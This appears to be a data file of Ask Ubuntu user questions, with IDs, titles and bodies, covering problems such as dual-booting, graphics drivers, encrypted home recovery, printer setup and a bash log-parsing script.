481288	recovering encrypfs encrypted home from livecd	background : i have this laptop that i installed ubuntu on a while ago , i think it was lucid lynx ? i am currently more updated and on 12.04 . anyway at that point i did n't know the first thing about linux systems ( still do n't know much ) , so i installed / on one partition . this worked fine until i broke something ( iirc it was to do with gnome 3 ) , so i decided to grab my data and leave , because it was time for a new os anyway . to my horror i have since found i can not access the encrypted /home directory . i am using a live disk , and i can unencrypt /home with encrypfs , but it is read only , so no copying to the hdd . i am also not able to access some other directories like /opt /usr . problems ( tl ; dr ) : having issues with encrypfs giving back read only data of my now unencrypted /home , so i ca n't copy it . problems with copying a old data in general . need help .
481289	suspicious processes starting with `` [ ? /- ] '' with after upgrading to trusty	i have just upgraded to trusty ( this may not be relevant ) . i fired up top , and noticed a heap of processes running as root that i had not noticed before . for example : 234 root 39 19 0 0 0 s 0.0 0.0 0:01.86 [ ? /-1610198336 ] 235 root 0 -20 0 0 0 s 0.0 0.0 0:00.00 [ ? /-1610198336 ] 236 root 0 -20 0 0 0 s 0.0 0.0 0:00.00 [ ? /-1610198336 ] ` so i ran the following ps command : ps axu | grep ? \/ | grep root which gave the following ( redacted ) output : root 234 0.0 0.0 0 0 ? sn 14:38 0:01 [ ? /-1610198336 ] root 235 0.0 0.0 0 0 ? s < 14:38 0:00 [ ? /-1610198336 ] root 236 0.0 0.0 0 0 ? s < 14:38 0:00 [ ? /-1610198336 ] root 239 0.0 0.0 0 0 ? sn 14:38 0:00 [ ? /-1610198336 ] root 240 0.0 0.0 0 0 ? sn 14:38 0:00 [ ? /-1610198336 ] root 241 0.0 0.0 0 0 ? sn 14:38 0:00 [ ? /-1610198336 ] root 242 0.0 0.0 0 0 ? sn 14:38 0:00 [ ? /-1610198336 ] root 243 0.0 0.0 0 0 ? sn 14:38 0:00 [ ? /-1610198336 ] root 244 0.0 0.0 0 0 ? sn 14:38 0:00 [ ? /-1610198336 ] root 245 0.0 0.0 0 0 ? sn 14:38 0:00 [ ? /-1610198336 ] root 246 0.0 0.0 0 0 ? sn 14:38 0:00 [ ? /-1610198336 ] root 247 0.0 0.0 0 0 ? sn 14:38 0:00 [ ? /-1610198336 ] root 248 0.0 0.0 0 0 ? sn 14:38 0:00 [ ? /-1610198336 ] root 249 0.0 0.0 0 0 ? sn 14:38 0:00 [ ? /-1610198336 ] root 250 0.0 0.0 0 0 ? sn 14:38 0:00 [ ? /-1610198336 ] root 251 0.0 0.0 0 0 ? sn 14:38 0:00 [ ? /-2144731094 ] root 252 0.0 0.0 0 0 ? sn 14:38 0:00 [ ? /-1610198336 ] root 253 0.0 0.0 0 0 ? sn 14:38 0:00 [ ? /-1610198336 ] root 254 0.0 0.0 0 0 ? sn 14:38 0:00 [ ? /-1610198336 ] root 255 0.0 0.0 0 0 ? sn 14:38 0:00 [ ? /-1610198336 ] root 256 0.0 0.0 0 0 ? sn 14:38 0:00 [ ? /-1610198336 ] root 257 0.0 0.0 0 0 ? sn 14:38 0:00 [ ? /-1610198336 ] root 258 0.0 0.0 0 0 ? sn 14:38 0:00 [ ? /-1610198336 ] root 259 0.0 0.0 0 0 ? sn 14:38 0:00 [ ? /-1610198336 ] root 260 0.0 0.0 0 0 ? sn 14:38 0:00 [ ? /-1610198336 ] root 261 0.0 0.0 0 0 ? sn 14:38 0:00 [ ? /-1610198336 ] root 262 0.0 0.0 0 0 ? sn 14:38 0:00 [ ? /-1610198336 ] root 263 0.0 0.0 0 0 ? sn 14:38 0:00 [ ? /-1610198336 ] root 264 0.0 0.0 0 0 ? sn 14:38 0:00 [ ? /-1610198336 ] root 265 0.0 0.0 0 0 ? sn 14:38 0:00 [ ? /-1610198336 ] root 266 0.0 0.0 0 0 ? sn 14:38 0:00 [ ? /-1610198336 ] root 267 0.0 0.0 0 0 ? sn 14:38 0:00 [ ? /0 ] a lsof does n't explain much more to me : sudo lsof -p 423 command pid user fd type device size/off node name ^x/-16101 423 root cwd dir 8,66 4096 2 / ^x/-16101 423 root rtd dir 8,66 4096 2 / ^x/-16101 423 root txt unknown /proc/423/exe can anyone explain the purpose of these processes ? this is ubuntu server without x installed . i am using zfs , but not as a root file system using the zfs ppa . other than the above , this is a very vanilla install .
481290	ubuntu vm 14.04 gui	i have installed ubuntu vm image 14.04 and i used startx command to display the gui , it worked fine . after restarting the vm , i am not able to see the left side menu bar . however the menu bar is active but it is not visible at all . how to fix this ? please guide .
481292	how can i open jnlp files with `` lbnetx-java '' ?	what is libnetx-java package and how can i use it ( to open '.jnlp ' files ) ? ? thank you .
481293	selinux implementation in ubuntu	how does ubuntu implements selinux ... ? what are the pacakges ( modules ) involved in implementation of selinux on ubuntu
481297	how to set display icc profile in kubuntu ?	how to set icc profile for display in kubuntu ? in system settings - color i can add .icc file to the device , set the checkbox . but the device does not actually use the profile . there is no apply button or something , too.no errors when run from the terminal , too . just do n't work .
481298	dropbox intallation	i have been trying to install dropbox from the software center but i cant find the `` install '' option , it only shows the `` use this source '' option . i also tried to install it via terminal and still failed.please help
481306	update fails to install	i get the below error when i try to install updates using software updater : not enough free disk space the upgrade needs a total of 81.3 m free space on disk '/boot ' . please free at least an additional 15.9 m of disk space on '/boot ' . empty your trash and remove temporary packages of former installations using 'sudo apt-get clean ' . what should i do ? firmtechnologies @ firmtechnologies : ~ $ ( ls -l /boot ) total 155801 -rw-r -- r -- 1 root root 1158016 may 3 01:30 abi-3.13.0-24-generic -rw-r -- r -- 1 root root 1161713 may 8 01:31 abi-3.13.0-26-generic -rw-r -- r -- 1 root root 1161713 may 15 20:07 abi-3.13.0-27-generic -rw-r -- r -- 1 root root 1161764 jun 4 22:57 abi-3.13.0-29-generic -rw-r -- r -- 1 root root 165510 may 3 01:30 config-3.13.0-24-generic -rw-r -- r -- 1 root root 165538 may 8 01:31 config-3.13.0-26-generic -rw-r -- r -- 1 root root 165521 may 15 20:07 config-3.13.0-27-generic -rw-r -- r -- 1 root root 165544 jun 4 22:57 config-3.13.0-29-generic drwxr-xr-x 5 root root 1024 jun 6 14:31 grub -rw-r -- r -- 1 root root 29091568 may 7 21:31 initrd.img-3.13.0-24-generic -rw-r -- r -- 1 root root 29094684 may 12 12:24 initrd.img-3.13.0-26-generic -rw-r -- r -- 1 root root 29095678 may 18 10:57 initrd.img-3.13.0-27-generic -rw-r -- r -- 1 root root 29093700 jun 6 14:32 initrd.img-3.13.0-29-generic drwx -- -- -- 2 root root 12288 apr 30 17:11 lost+found -rw-r -- r -- 1 root root 176500 mar 12 13:31 memtest86+.bin -rw-r -- r -- 1 root root 178176 mar 12 13:31 memtest86+.elf -rw-r -- r -- 1 root root 178680 mar 12 13:31 memtest86+_multiboot.bin -rw -- -- -- - 1 root root 3372643 may 3 01:30 system.map-3.13.0-24-generic -rw -- -- -- - 1 root root 3377429 may 8 01:31 system.map-3.13.0-26-generic -rw -- -- -- - 1 root root 3377429 may 15 20:07 system.map-3.13.0-27-generic -rw -- -- -- - 1 root root 3378267 jun 4 22:57 system.map-3.13.0-29-generic -rw -- -- -- - 1 root root 5776416 may 3 01:30 vmlinuz-3.13.0-24-generic -rw -- -- -- - 1 root root 5790912 may 8 01:30 vmlinuz-3.13.0-26-generic -rw -- -- -- - 1 root root 5790912 may 15 20:07 vmlinuz-3.13.0-27-generic -rw -- -- -- - 1 root root 5792544 jun 4 22:57 vmlinuz-3.13.0-29-generic
481307	shockwave doesnt work !	chrome , chromium and firefox dont run shockwave flash , i do n't know what else i should do to solve this problem , this is pissing me off . i 've tried every 'possible ' solution from the forums or blogs but no one works yet . every blog or post or forum say that you need to delete pepperflash.so or something like that to get it working , but the problem is ... i do n't have any pepperflash.so either ! ! ! . so , i dont find the way to solve this problem . does anyone know any way ?
481310	trouble installing xubuntu 14.04 alongside windows 7	i wiped my disk clean and decided to dual boot xubuntu 14.04 and windows 7 in my laptop . i started by installing windows 7 and created two 50gb partitions - one for each so - and other ~200gb partition for storage . i went on installing windows in one of the partitions and was hoping i could simply install xubuntu in the remaining 50gb partition . the problem is , the live cd installer does n't acknowledge the existence of the windows install and also does not display the 50gb partition i left for the xubuntu install . also , if i choose the `` something else '' option , it shows my whole drive as not being partitioned ( ? ) : when i run in live cd mode ( actually from a usb pen ) , it auto mounts the storage partition , the windows partition and the boot partition ( i 'm guessing created by windows ) . so , i was hoping someone could give me some pointers on how i could get the installer detecting the windows install so i could dual-boot safely . i 'm very new to linux and this kind of operation scares me a bit because i do n't want to damage my windows 7 install - although it 's backed up , i hate to have to `` clean up '' again ... : ) edit : i have been reading around about this and i know the windows session was terminated correctly ( ie , shut down ) . also , the `` sistema reservado '' ( system reserved - i 'm portuguese ) partition in the image above shows the following : edit 2 : as requested , here 's the windows disk management screenshot : edit 3 : output of sudo gdisk -l : xubuntu @ xubuntu : ~ $ sudo gdisk -l gpt fdisk ( gdisk ) version 0.8.8 problem opening -l for reading ! error is 2 . the specified file does not exist ! output of sudo parted -l : xubuntu @ xubuntu : ~ $ sudo parted -l warning : /dev/sda contains gpt signatures , indicating that it has a gpt table . however , it does not have a valid fake msdos partition table , as it should . perhaps it was corrupted -- possibly by a program that does n't understand gpt partition tables . or perhaps you deleted the gpt table , and are now using an msdos partition table . is this a gpt partition table ? yes/no ? ^c model : ata hitachi hts54323 ( scsi ) disk /dev/sda : 320gb sector size ( logical/physical ) : 512b/512b partition table : gpt number start end size file system name flags model : lexar usb flash drive ( scsi ) disk /dev/sdb : 16.0gb sector size ( logical/physical ) : 512b/512b partition table : msdos number start end size type file system flags 1 57.3kb 16.0gb 16.0gb primary fat32 boot , lba note : the sudo parted -l command issued a warning about gpt tables before printing out the table . also , the only thing showing up is a 16gb pen drive i 'm using with live xubuntu . edit 4 : i 've been digging around a little bit more about gpt and ubuntu not finding it/recognizing it and according to this answer , i output sudo fixparts /dev/sda : xubuntu @ xubuntu : ~ $ sudo fixparts /dev/sda fixparts 0.8.8 loading mbr data from /dev/sda notice : gpt signatures detected on the disk , but no 0xee protective partition ! the gpt signatures are probably left over from a previous partition table . do you want to delete them ( if you answer 'y ' , this will happen immediately ) ? ( y/n ) : n warning : 0xee partition does n't start on sector 1 . this can cause problems in some oses . mbr command ( ? for help ) : p ** note : partition numbers do not indicate final primary/logical status , ** unlike in most mbr partitioning tools ! ** extended partitions are not displayed , but will be generated as required . disk size is 625142448 sectors ( 298.1 gib ) mbr disk identifier : 0xdd5e2c5f mbr partitions : can be can be number boot start sector end sector status logical primary code 1 * 2048 206847 primary y y 0x07 2 206848 104859647 primary y 0x07 3 104859648 209717247 primary y 0x06 4 209717248 625139711 primary y 0x07 should i procede and fix the gpt table as indicated in the answer ( by __zapping__ it ) ?
481317	sync all gnome shell settings	i have different computers ( laptop , private , work ) and want to sync all gnome shell settings , including panels , keyboard shortcuts , gnome shell extensions , ... my plan is to create a dropbox folder gnome-settings which contains all relevant files and create symlinks to the required paths . i know that settings can be dumped with gconftool -- dump ... and then loaded with gconftool -- load ... but i would prefer to sync the files only ( if this is possible ) without having to export/import any settings ... my question is now which files/folders do i have to sync . custom application starters : .local/share/applications custom icons : ~/.local/share/icons gnome shell extensions : ~/.local/share/gnome-shell/extensions ( is it safe to just sync this folder or do the extensions have to be installed ? ) keybord shortcuts : ? ? ? online accounts : ? ? ? panels : ? ? ? ? favourite applications : ? ? ? default applications for certain file types : ? ? gnome shell settings : ? ? ? ( the settings from gconftool must be saved anywhere ... . ) number/names/arrangement of workspaces : ? ? ? what else ? ? please help me to complete the list
481318	qml : overriding a signal handler from other element	is it possible to override an elements action ( eg ontriggered ( ) of a timer ) from within the onclick ( ) of a button ? something like so- > button { id : centerbtn objectname : `` button '' onclicked : { delaytimer.running = true ; delaytimer.ontriggered { } ; // override here } timer { id : delaytimer interval : 1000 running : false repeat : false ontriggered : //something implemented here } }
481321	how to install dependencies without upgrading existing packages	i am installing some custom built packages using dpkg -i and want a command to automatically install the dependencies . i tried apt-get -f install which installs any unmet dependencies . but it also upgrades my custom built packages , which i do n't want . is there any command that just installs the dependencies without upgrading the existing packages , or the only way is to install all the dependencies manually ?
481322	emma - mysql server has gone away	i 'm using emma to connect to remote mysql server . after about minute inactivity i have to reconnect to server to execute query , which is very cumbersome . it looks like this problem appears only when connecting to remote server - not localhost . i guess that emma does n't reconnect automatically , which mysql workbench does in the same machine . i do n't see any settings , where i can change it . thanks in advance , eve
481323	ca n't run photoshop cs2 on ubuntu 14.04 x86_64	i have installed photoshop cs2 ( the free version ) on ubuntu 14.04 x86_64 . photoshop gets started and at the loading splash screen it just freezes at `` initializing tools '' and after 30 seconds or so , it just closes . any help is appreciated . wine version : wine-1.7.19
481324	adding 1600x900 screen resolution	i am new to ubuntu . i have a dell 17r se laptop with 1600x900 resolution . i use vmware to run ubuntu 14.04 lts on windows 8.1 using vmware . i have hd4000 and nvidia 650m gpu in my laptop . now the problem is there is no 1600x900 resolution in ubuntu . and it cant detect my display . i tried many solutions available in the internet and found this one working best for me . http : //ubuntuforums.org/showthread.php ? t=1966900 xrandr -- newmode `` 1600x900_60.00 '' 118.25 1600 1696 1856 2112 900 903 908 934 -hsync +vsync xrandr -- addmode virtual1 `` 1600x900_60.00 '' xrandr -- output virtual1 -- mode `` 1600x900_60.00 '' once i type the above code in terminal , resolution changes to 1600x900 but when i power off my os and start it again then my resolution is back to 1440x900 . how do i make sure that the above code run after boot ? also in the source of the code its written that i need to add this code in /etc/gdm/init/default so that it loads everytime but i couldnt find gdm folder .
481327	i ca n't find windows after installing ubuntu 14.04	i installed ubuntu 14.04 on my windows 7 laptop and now when i boot up it goes straight to ubuntu with no option to choose windows . how do i find windows again ?
481329	can i restart the kde plasma desktop without logging out ?	i 'm just talking about the standard kde desktop . after a while ( many days ) of running the task bar stops working properly . this is due to some sort of undiagnosed bug but that 's really not my boggle at the moment . it 's fixed as soon as i log out and in again . i have to close everything and ongoing processes like virtual machines have to shut down . it 's a big pain . it typically means i put up with a bit of flickering for many days . is there a way to just reload the desktop without bombing all the running applications ?
481332	amd drivers problem : ca n't display the resolution	so , i 'm kind of new to ubuntu and linux in general , i installed the latest ( ubuntu 14.04 ) and everything went fine , except for the resolution so i thought that it was a driver problem because i have a amd hd 7750 and maybe it required additional proprietary drivers so i installed amd catalyst ( latest version ) , and then rebooted . and now my monitor says ca n't display and i ca n't see the gui . i can go to terminal ( pressing ctrl + alt + f1 , f2 , f3 etc ) but not the ui .
481335	kubuntu 14.04 freezing on macbook pro 6,2 , not booting ldm	i 've reinstalled kubuntu 14.04 multiple times to fix this , but it has not fixed this problem . i have a macbook pro 2010 15 inch with nvidia geforce gt 330m 256 mb gpu . basically , this is what happens to make the bug appear : i install kubuntu 14.04 ( manual install dual-boot mac os x ) reboot multiple times bug appears . shows this screen then stops at black screen . i have tried booting from the earlier kernel version , and it boots to ldm , but i ca n't logon because the upper half of the screen is covered by a weird graphical thing . also , the upper half of the screen is unusable because it is covered in something . is there something i should do on reinstall or something i should do to fix the current bug ?
481337	adding static mac entry to a bridge	is there a way to add a static mac entry in a linux bridge against a certain port x ? i.e . i know that the mac in question resides behind port x and it will not be learnt for a while ( assuming unidir traffic ) and i want to avoid flooding to all ports . thanks , reshad .
481339	how to get back up of my installed program in ubuntu	i have ubuntu version 13 on my system now i want to install ubuntu 14. the problem is that i installed gedit and aptana studio and some other software from ubuntu and installed on my device . the question is that should i have to download them again ? ? ? ?
481341	installing ubuntu kylin alongside classical ubuntu	i have been trying to install classical ubuntu 14.04 alongside ubuntu kylin 14.04 with dual-boot ( or in fact multi-boot since there is also a chinese-language windows installation ) . we a mixed family so while i will use classical ubuntu in english another family member will use kylin . however , after installing kylin from the disk and trying to install ( classical ) ubuntu i would just keep telling me `` an ubuntu 14.04 installation already exists '' and so i ended up choosing the option to erase the existing installation ( kylin ) and overwrite it with the normal ubuntu . is there a dummy-proof way of installing both in parallel , and would i need to fear any complications when one of the versions or at least grub gets updated to a new version ?
481346	trying to install/dual boot	i have widows 8 ( pre-installed ) , and i was not a fan . so i thought i would try ubuntu as many people from what i hear that use it , like it , and hey , free os . well before i was able to do all the instalations , i had to goto work , so my girlfriend ( whio is not at all tech savy ) decided to help . she told me she installed it , ( it popped up with a thank you for installing message ) she then shut it off . when she turned it on , when i turn it on , i boot right to windows , i have never installed a secondary os . and i was hoping someone with more experiance than i could walk me through what i need to do in order to be able to dual boot ubuntu version is 14.04 and 64bit
481347	what is .gksu.lock file	i have been searching for knowing what exactly is /home/user/.gksu.lock . but i did n't find any exact answer . so what i want to know is what does the file do ? if i remove or edited the file , does it affect my system in any way ?
481348	hp envy ts 15 ubuntu compatibilty ?	i m planning to partition my current laptop hp envy ts 15 to install ubuntu . is ubuntu going to run on this machine ?
481349	mysql questions for beginners	ok , i have a few questions regarding mysql . i am currently running ubuntu 12.04.4 lts command line version . i am looking for a database that i can use . i am confused at this point because i am uninformed . mysql is just one database that is on the server ? or can it contain several or many databases what programs do i use to access it on the server or is it a vt-100 type access ? i understand that mysql comes with lamp ? or ubuntu . i am thinking that it is already installed but not sure how to access it , but that is another question for later . outside of the man pages and the ubuntu manual , is there a site for its setup and use ? thanks !
481350	how do i install dell 2150cdn printer	love ubuntu but can not get printer to work . it 's a dell 2150cdn colour laser printer . i went to settings and tried to add printer and tried all various options but they alll jang for over an hour . tried in both gnome and kde . chose option to install openprint but it does not load , just hangs . loaded openprint fron software centre but doesnt seem to make any difference . searched web and found dell pdl file , d/led and installed . printer works but does not print documents , just lots of blank pages with 1 line of symbols on some of them . went to dell site and d/l 'd driver file but also makes no difference . stuck now and need to get printer working or forced to retreat back to windoze . any advice ? cheers brian
481351	usb 3.0 to dvi adapter on ubuntu 14.04	i have a usb 3.0 to dvi adapter made by startech and found ubuntu drivers by contacting the chipset manufacturer , but the latest driver that they had for ubuntu was for 12.04 . since i am rather new to ubuntu , i was wondering how difficult it would be to get this driver working on 14.04 or what usb 3.0 to external monitor adapters would be recommended .
481352	ppa for ubuntu 12.04	i have been trying to add a ppa for ubuntu 12.04 and keep getting errors like : w : failed to fetch http : //linux.dropbox.com/ubuntu/dists/ < release-main > /release.gpg unable to connect to linux.dropbox.com : http : w : failed to fetch http : //ppa.launchpad.net/tucan/unstable/ubuntu/dists/prec/release.gpg unable to connect to ppa.launchpad.net : http : please help .
481353	hdd wo n't mount [ solved ]	when plug in hdd this message came up /dev/sdb1 at /media/filip/f28823a2-4de1-44c5-90fe-62fb3c241b73 : command-line `mount -t `` ext4 '' -o `` uhelper=udisks2 , nodev , nosuid '' `` /dev/sdb1 '' `` /media/filip/f28823a2-4de1-44c5-90fe-62fb3c241b73 '' ' exited with non-zero exit status 32 : mount : wrong fs type , bad option , bad superblock on /dev/sdb1 , missing codepage or helper program , or other error in some cases useful info is found in syslog - try dmesg | tail or so and this is dmesg | tail output : [ 11870.811559 ] sd 4:0:0:0 : [ sdb ] mode sense : 28 00 00 00 [ 11870.814268 ] sd 4:0:0:0 : [ sdb ] no caching mode page found [ 11870.814283 ] sd 4:0:0:0 : [ sdb ] assuming drive cache : write through [ 11870.825302 ] sd 4:0:0:0 : [ sdb ] no caching mode page found [ 11870.825318 ] sd 4:0:0:0 : [ sdb ] assuming drive cache : write through [ 11870.878658 ] sdb : sdb1 sdb2 [ 11870.884220 ] sd 4:0:0:0 : [ sdb ] no caching mode page found [ 11870.884235 ] sd 4:0:0:0 : [ sdb ] assuming drive cache : write through [ 11870.884244 ] sd 4:0:0:0 : [ sdb ] attached scsi disk [ 11871.387003 ] ext4-fs ( sdb1 ) : bad geometry : block count 121048832 exceeds size of device ( 1695488 blocks ) fdisk -l output : disk /dev/sdb : 500.1 gb , 500107862016 bytes 255 heads , 63 sectors/track , 60801 cylinders , total 976773168 sectors units = sectors of 1 * 512 = 512 bytes sector size ( logical/physical ) : 512 bytes / 512 bytes i/o size ( minimum/optimal ) : 512 bytes / 512 bytes disk identifier : 0x0003bff7 device boot start end blocks id system /dev/sdb1 * 2048 13565951 6781952 83 linux /dev/sdb2 13565952 15663103 1048576 83 linux i apologize in advance if some crucial info is missing . i kindly ask for you to tell me which info is needed and i will post it in no time . will be most grateful if someone can guide me .
481354	unable to locate package	there are many questions about unable to locate package . for example : if user try to install package by using apt-get then the following error shown . ( here package is used only as example for displaying error message ) : sudo apt-get install package reading package lists ... done building dependency tree reading state information ... done e : unable to locate package package what does this error mean ? how do i solve it ? here provided general solution to understand and how to solve such type of error ( which is helpful for new users that may unaware of repository-apt install mechanism ) note : for resolving unmet-dependencies , visit : this question .
481356	script issue ( incrementation )	i 'm writing a script in bash . my output down below is wrong . the test data i 'm pulling from makes it so that all connections allowed and denied should be in time `` 00 '' yet for every day i crawl through it bumps to the next hour . i have my code below and sample output at the very bottom . can you help me ? it 's giving me a headache . # ! /bin/bash echo `` mega crawler by da interns '' > result echo `` enter the month of the file you 're trying to read '' echo `` if month is one number enter one number if two numbers enter two numbers '' read m # case staement changes m input into a month an reassigns single digit months into double digit if [ [ $ m -lt 13 & & $ m -gt 0 ] ] then case `` $ m '' in '' 1 '' ) month= '' jan '' ; m= '' 01 '' ; dlim= '' 31 '' ; ; '' 2 '' ) month= '' feb '' ; m= '' 02 '' ; dlim= '' 29 '' ; ; '' 3 '' ) month= '' mar '' ; m= '' 03 '' ; dlim= '' 31 '' ; ; '' 4 '' ) month= '' apr '' ; m= '' 04 '' ; dlim= '' 30 '' ; ; '' 5 '' ) month= '' may '' ; m= '' 05 '' ; dlim= '' 31 '' ; ; '' 6 '' ) month= '' jun '' ; m= '' 06 '' ; dlim= '' 30 '' ; ; '' 7 '' ) month= '' jul '' ; m= '' 07 '' ; dlim= '' 31 '' ; ; '' 8 '' ) month= '' aug '' ; m= '' 08 '' ; dlim= '' 31 '' ; ; '' 9 '' ) month= '' sep '' ; m= '' 09 '' ; dlim= '' 30 '' ; ; '' 10 '' ) month= '' oct '' ; dlim= '' 31 '' ; ; '' 11 '' ) month= '' nov '' ; dlim= '' 30 '' ; ; '' 12 '' ) month= '' dec '' ; dlim= '' 31 '' ; ; esac else echo `` please make sure to enter a valid month . '' read m fi echo -e `` '' echo `` enter the year of the file you 're trying to read '' read y echo -e `` '' for d in $ ( seq -f `` % 02g '' 1 5 ) ; do file= ( $ ( find -name `` traffic_ $ m- $ d- $ y '' ) ) echo `` -- -- -- -- -- -- -- -- -- -- -- -- -day $ d -- -- -- -- -- -- -- -- -- -- -- -- - '' > > result for i in $ ( seq -f `` % 02g '' 0 23 ) ; do grep `` $ month $ i '' $ file > tempoutput countallow= ( $ ( grep -c `` allow '' tempoutput ) ) countdeny= ( $ ( grep -c `` deny '' tempoutput ) ) echo -e `` $ countallow connections allowed at $ i time '' > > result echo -e `` $ countdeny connections denied at $ i time\n '' > > result rm tempoutput done done -- -- -- -- -- -- -- -- -- -- -- -- -day 01 -- -- -- -- -- -- -- -- -- -- -- -- - 0 connections allowed at 00 time 0 connections denied at 00 time 77 connections allowed at 01 time 25 connections denied at 01 time 0 connections allowed at 02 time 0 connections denied at 02 time -- -- -- -- -- -- -- -- -- -- -- -- -day 02 -- -- -- -- -- -- -- -- -- -- -- -- - 0 connections allowed at 00 time 0 connections denied at 00 time 0 connections allowed at 01 time 0 connections denied at 01 time 76 connections allowed at 02 time 26 connections denied at 02 time
481360	best ubuntu step-by-step guide book	i 've just installed ubuntu-14.04-desktop-i386 on virtual machine . i do n't have good info on ubuntu and neither other linux 's distributions . for example i even do n't know how to install an app on it . i need a good book which guide me step-by-step the ubuntu operating system . any suggestion ?
481365	issues running alongside windows and connecting to wireless network	okay so i 'm trying to get started with ubuntu but i 'm encountering a couple problems : when i boot up the cd and try to install , it does not recognize that i have windows 7 installed and just sees it as unallocated space so the only way i 've been able to install it is by wiping the drive which was fine , but it 'd be nice to be able to boot either . and secondly , i can not figure out how to get wireless working . when i try to connect on the initial installation process it tells me to connect to my adapter and just asks for a password . i suspect it could be a driver issue but i would n't know where to find it . i have an ar9485 atheros adapter and am attempting to run ubuntu 14.04 . thanks
481367	why has n't 14.04 ( 64-bit ) claimed my intel pro/100 ve ethernet connection ?	i 've installed 14.04 on my old sony vaio vgn-fe41e and the ethernet connection does not work . sudo lshw *-network unclaimed description : ethernet controller product : pro/100 ve network connection vendor : intel corporation physical id : 8 bus info : pci @ 0000:0a:08.0 version : 02 width : 32 bits clock : 33mhz capabilities : pm cap_list configuration : latency=64 maxlatency=56 mingnt=8 resources : memory : d2005000-d2005fff ioport:6000 ( size=64 ) sudo lsmod shows nothing ( completely empty except for headers , 'modules , size , used by ' ) . note : this is not the only piece of hardware listed as unclaimed by lshw .
481375	ubuntu sdk : how do i implement a `` onclick '' for an image in qml ?	i have a background image for my page , and i want to implement a sort of page refresh when the background is clicked . however , i did n't find any actions for the image element in qt quick . what 's the right way to implement this ?
481378	photoshop alternative with same keyboard shorcuts	tldr ; is there a program with the same keyboard shortcuts and/or user interface as ps . i know the `` photoshop alternative '' question has been asked so many times , but i feel this variant is worth the time to ask . i am a web designer and have been using ps daily on a windows or mac machine for about 10 years , but i do most of my development in linux . the only thing that has been keeping me from the full switch to linux is ps . i have tried many alternatives , including gimp , but i feel the barrier to entry is too high for one reason and one reason only , the keyboard shortcuts . over the years i have become very adept and quick in the use of ps because of keyboard shortcuts and muscle memory . i realize that many shortcuts can be customized , but many actions are just too different from ps . so my question is what programs are out there that are the closest to ps in keyboard shortcuts and interface . i do n't care if i have to do a bunch of customization to get it as close as possible , but i just ca n't take too much time to learn a completely new workflow . of course i realize that any software will take time and effort , i just want to make that time/effort as minimal as possible . thanks in advance for your responses . edit i should tell you the most important features and workflow i use on a daily basis are , smart objects , linked documents , save for web and devises .
481381	can not detect your screen , graphics and devices.it also shows low on graphics	i am really new to this linux world and my system is running really slow since after installing ubuntu 14.04 . it is showing some type of error : low on graphics . can not detect your screen , graphics and devices . i am running the os in low graphics mode and moreover i have to goto boot options every time i switch on my pc and select the low graphic mode option in ( advanced options in ubuntu ) → recovery mode . how should i make my pc in normal working condition . sudo lshw -c display *-display unclaimed description : vga compatible controller product : c61 [ geforce 6150se nforce 430 ] vendor : nvidia corporation physical id : d bus info : pci @ 0000:00:0d.0 version : a2 width : 64 bits clock : 66mhz capabilities : pm msi vga_controller bus_master cap_list configuration : latency=0 resources : memory : de000000-deffffff memory : c0000000-cfffffff memory : dd000000-ddffffff memory : dff40000-dff5ffff
481383	usb mouse/keyboard lagging , while ps2 mouse/keyboard works perfectly	even though ps2 mouse/keyboard work completely smooth , i have got the problem that usb mice/keyboards do have a lot of input lag . ( on the keyboard resulting on missing characters or double characters . ) i am running 14.04 and this is the lsusb output : bus 002 device 007 : id 046a:0011 cherry gmbh g83 ( rs 6000 ) keyboard bus 002 device 005 : id 045e:0084 microsoft corp . basic optical mouse i have tried this with different mice/keyboards , always the same symptoms .
481384	kubuntu 14.04 does not unlock the screen	i installed kubuntu 14.04 on my acer aspire e1-431-2896 , this installation took place normally with the default installation of updates . the problem is occurring in my everyday use , when the notebook is a certain idle time the system naturally enters power saving and suspends the session for ram memory , which usually always happened in other versions of kubuntu , the problem in 14.04 occurs when i try to use it again . in 14.04 after entering suspend mode it no longer returns to the desktop , when i click or use the mouse sometimes the login box does not appear and , when present , directs me to a screen that has only the default kubuntu image as wallpaper wall , where i can not go out or perform some action . commands such as ctrl + esc , enter , alt + f1 , have no effect and whenever this happens i need to reboot the machine using the physical button .
481388	installing lxde broke my system	i installed lxde and when i rebooted all i got was a black screen . i did n't even get the screen to choose desktop environments . what do i do ?
481393	ubuntu sdk : qml with c++ recommended app design methodology	are there documented general guidelines for mixing qml with c++ for ubuntu apps ? `` qml for ui design and c++ for logic '' seems to be the trend . is this the right way forward ?
481394	install lubuntu w/o disc or flash drive ?	my winxp desktop was recently blasted with a few bits of malware . i removed the malware but the damage is done , and my os is finally at its end ; it 's barely chugging along as it is . so , i 'm figuring what i 'd like to do is replace the os with lubuntu , which i know is a lightweight , heavily winxp-esque distro of linux . however , every article , every explanation , i 've read online has stated i need either a 4+ gib flash drive or a burnable cd . well , i have a flash drive , but it 's only 1 gib ; and i have a disc burner , but no disc . so , frankly , i doubt i 'll be able to do it . but hey , i figured i might as well ask away here on au ; what have i got to lose ? so my question is this : would it be possible to replace my winxp os w/ lubuntu without using either a 4+ gib flash drive or a burnable cd ? thanks very much . i appreciate any help you could give .
481399	headset mic not working on desktop	i have philips she 3575 wired headset . the headphones are working fine . but there is only one jack , and the mic is not working . the options i see in sound- > input are rear microphone and front microphone . i have ubuntu 14.04 64bit . asus sabertooth motherboard .
481401	application software updater not working anymore ( ubuntu 14 )	as soon as i log in a this red sign appears top a and it says : and error occurred .please run package manger from the right-click menu or apt-getin a terminal to see what is wrong the error message was `` error.opening the cache ( e : encounterd a section with no package header , e : problem with mergelist/var/lib/apt/lists/dl.google.com_linux_chrome_deb_dists_stable_main_i18n_translation-en % 5fus , e : the package lists or status filecould not be parsedor opend . ) this usaully means that your installed package have unmet dependencies
481405	will u1 phase out affect apps purchased in the software center ?	i 've just found the way to reinstall humble bundle games after i migrate to the latest lts . i just need to confirm that this method is still valid even after u1 is gone . the method to reinstall is described in this thread : downloading a previously purchased app with ubuntu software center
481408	auto booting in to windows every time i shutdown from ubuntu	i upgraded to windows 8.1 and used this tutorial to fix my computer so i can boot into ubuntu . but for some reason every time i shutdown ubuntu , the next time i turn my computer on it auto boots up into windows . but when i boot into windows , shut down , and turn my computer back on , grub2 shows up and i can choose ubuntu . i tried installing updates for ubuntu , and updating grub2 . does anyone know what 's going on ?
